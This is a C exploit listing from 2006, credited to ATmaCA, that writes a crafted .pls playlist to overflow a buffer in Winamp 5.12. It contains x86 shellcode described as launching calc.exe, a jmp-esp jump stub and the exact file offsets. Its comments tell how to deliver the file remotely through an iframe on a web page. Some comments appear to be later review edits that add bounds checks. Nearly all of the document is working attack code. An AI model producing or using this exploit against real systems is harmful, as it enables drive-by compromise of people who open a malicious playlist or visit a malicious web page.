# Title : Winamp <= 5.12 (Crafted PLS) Remote Buffer Overflow Exploit (0-Day)
# Published : 2006-01-29
# Author : ATmaCA
/*
*
* Winamp 5.12 Remote Buffer Overflow Universal Exploit (Zero-Day)
* Bug discovered & exploit coded by ATmaCA
* Web: http://www.spyinstructors.com && http://www.atmacasoft.com
* E-Mail: atmaca@icqmail.com
* Credit to Kozan
*
*/
/*
*
* Tested with :
* Winamp 5.12 on Win XP Pro Sp2
*
*/
/*
* Usage:
*
* Run the exploit; it creates "crafted.pls" in the current directory.
* Double-click the file, or right-click it and select "Open".
* When Winamp parses it, the shellcode launches the Calculator (calc.exe).
*
*/
/*
*
* To use it remotely,
* make an HTML page containing an iframe that links to the .pls file.
*
* http://www.spyinstructors.com/atmaca/research/winamp_ie_poc.htm
*
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
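#define BUF_LEN 0x045D              /* total size of the generated .pls file */
#define PLAYLIST_FILE "crafted.pls"

/*
 * Pieces of the crafted playlist.
 *
 * The escape sequences (\r\n, \xHH) are written out in full here. The
 * extracted copy of this listing had the backslashes stripped ("rn", "x61"):
 * that still compiles, but then sizeof(shellcode)-1 is 492 instead of 164 and
 * the memcpy at offset 0x036C runs 251 bytes past the 0x045D-byte buffer in
 * main(). The sizes below line up with main()'s offsets exactly:
 * 0x0422 + (sizeof(szPlayListHeader2) - 1) == BUF_LEN.
 */

/*
 * Opening PLS keys. File1= is left unterminated so that everything main()
 * writes after it (NOP filler, shellcode, jump stub) becomes an overlong
 * File1 value. NOTE(review): the extracted listing shows "\\" (one literal
 * backslash); whether the original had a UNC-style "\\\\" cannot be told
 * from here.
 */
char szPlayListHeader1[] = "[playlist]\r\nFile1=\\";

/* Remaining PLS keys; placed at 0x0422 so the file ends exactly at BUF_LEN. */
char szPlayListHeader2[] = "\r\nTitle1=~BOF~\r\nLength1=FFF\r\nNumberOfEntries=1\r\nVersion=2\r\n";

/*
 * Jump to shellcode. 12 bytes; they appear to decode as
 * popad / fld [edx] / sub esp,0x34 / sub esp,0x70 / jmp esp (FF E4).
 */
char jumpcode[] = "\x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4";

/* Harmless calc.exe payload, 164 bytes (8 lines of 20 plus a 4-byte tail). */
char shellcode[] =
"\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02"
"\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48"
"\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4"
"\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12"
"\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69"
"\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6"
"\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5"
"\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21"
"\x61\xdd\x0e\x4d";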
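/*
 * Copies len bytes of src into the BUF_LEN-byte buffer buf at offset off.
 * Returns 0 on success, -1 (nothing written) if the copy would run past
 * the end of the buffer.
 */
static int place(char *buf, size_t off, const void *src, size_t len)
{
    if (off > BUF_LEN || len > BUF_LEN - off) {
        return -1;
    }
    memcpy(buf + off, src, len);
    return 0;
}

/*
 * Builds the crafted playlist in memory and writes it to PLAYLIST_FILE in
 * the current directory.
 *
 * Layout of the BUF_LEN (0x045D) byte file, offsets as in the original exploit:
 *   0x0000  szPlayListHeader1  "[playlist]\r\nFile1=..." (File1 value begins)
 *   ......  0x90 filler (x86 NOP) up to the shellcode
 *   0x036C  shellcode
 *   0x0412  jumpcode
 *   0x0422  szPlayListHeader2  remaining PLS keys, ending exactly at BUF_LEN
 *
 * Every copy goes through place(), so a mis-sized piece (for example a copy
 * of this listing whose "\x" escapes were stripped) is reported instead of
 * overflowing the heap buffer. The file is only created once the buffer has
 * been assembled successfully.
 *
 * argc/argv are unused. Returns 0 on success, 1 if the buffer cannot be
 * allocated, a piece does not fit, or the file cannot be created, written
 * or closed.
 */
int main(int argc, char *argv[])
{
    FILE *file = NULL;
    char *buf = NULL;
    int rc = 1;

    (void)argc;
    (void)argv;

    printf("\nWinamp 5.12 Remote Buffer Overflow Universal Exploit");
    printf("\nBug discovered & exploit coded by ATmaCA");
    printf("\nWeb: http://www.spyinstructors.com && http://www.atmacasoft.com");
    printf("\nE-Mail: atmaca@icqmail.com");
    printf("\nCredit to Kozan");

    buf = malloc(BUF_LEN);
    if (buf == NULL) {
        printf("\n [Err:] malloc()");
        goto out;
    }
    /* Everything not overwritten below is NOP filler. */
    memset(buf, 0x90, BUF_LEN);

    if (place(buf, 0x0000, szPlayListHeader1, sizeof(szPlayListHeader1) - 1) != 0 ||
        place(buf, 0x036C, shellcode, sizeof(shellcode) - 1) != 0 ||
        place(buf, 0x0412, jumpcode, sizeof(jumpcode) - 1) != 0 ||
        place(buf, 0x0422, szPlayListHeader2, sizeof(szPlayListHeader2) - 1) != 0) {
        printf("\n [Err:] payload piece does not fit in the %u-byte buffer",
               (unsigned)BUF_LEN);
        goto out;
    }

    file = fopen(PLAYLIST_FILE, "w+b");
    if (file == NULL) {
        printf("\n [Err:] fopen()");
        goto out;
    }
    if (fwrite(buf, BUF_LEN, 1, file) != 1) {
        printf("\n [Err:] fwrite()");
        goto out;
    }
    /* fclose() flushes; a failure here means the file is incomplete. */
    if (fclose(file) != 0) {
        file = NULL;
        printf("\n [Err:] fclose()");
        goto out;
    }
    file = NULL;

    printf("\n\n" PLAYLIST_FILE " has been created in the current directory.\n");
    rc = 0;

out:
    if (file != NULL) {
        fclose(file);
    }
    free(buf);
    return rc;
}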